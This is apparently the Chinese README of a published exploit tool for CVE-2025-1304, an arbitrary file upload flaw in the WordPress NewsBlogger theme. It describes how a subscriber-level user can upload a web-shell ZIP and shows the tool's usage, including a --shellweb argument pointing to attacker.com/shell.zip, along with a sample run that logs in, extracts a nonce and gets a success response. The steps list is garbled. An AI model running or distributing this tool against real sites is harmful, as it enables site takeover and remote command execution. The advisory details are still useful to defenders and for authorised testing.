CVSS 评分: 8.8(高危)
漏洞类型: 任意文件上传
组件: WordPress 主题
CVE 编号: CVE-2025-1304
WordPress NewsBlogger 主题(版本 <= 0.2.5.1)存在一个通过管理员欢迎面板触发的 任意文件上传 漏洞。
该漏洞允许任何经过身份验证的用户——包括拥有最低 订阅者 角色的用户——上传包含 Web Shell 的恶意 .zip 压缩包。
上传过程通过一个未经验证的插件 URL 字段完成,该字段未能正确验证上传文件的内容或类型。
成功利用此漏洞可能导致网站完全沦陷,包括远程命令执行和权限提升。
该 Python 脚本通过以下步骤自动化利用该漏洞:
nonce。python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme 存在任意文件上传漏洞 #作者: Nxploited ( Khaled Alenazi )
options:
-h, --help 显示此帮助信息并退出
--url, -u URL 目标基础 URL(例如 http://target/wordpress)
--username, -un USERNAME WordPress 管理员用户名
--password, -p PASSWORD WordPress 管理员密码
--shellweb, -shell SHELLWEB
恶意 Shell ZIP 文件的直接 URL(例如 http://attacker.com/shell.zip)
[+] 正在登录到 http://target/wordpress/wp-login.php
[+] 登录成功。
[+] 正在获取欢迎页面以提取 nonce:http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] 提取到 nonce:012818100b
[+] 正在向以下地址发送恶意插件 URL:http://target/wordpress/wp-admin/admin-ajax.php
[+] 服务器响应:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
此代码仅用于 教育和授权安全测试 目的。
作者不对该工具的任何滥用或造成的损害承担责任。
作者:Nxploited ( Khaled Alenazi)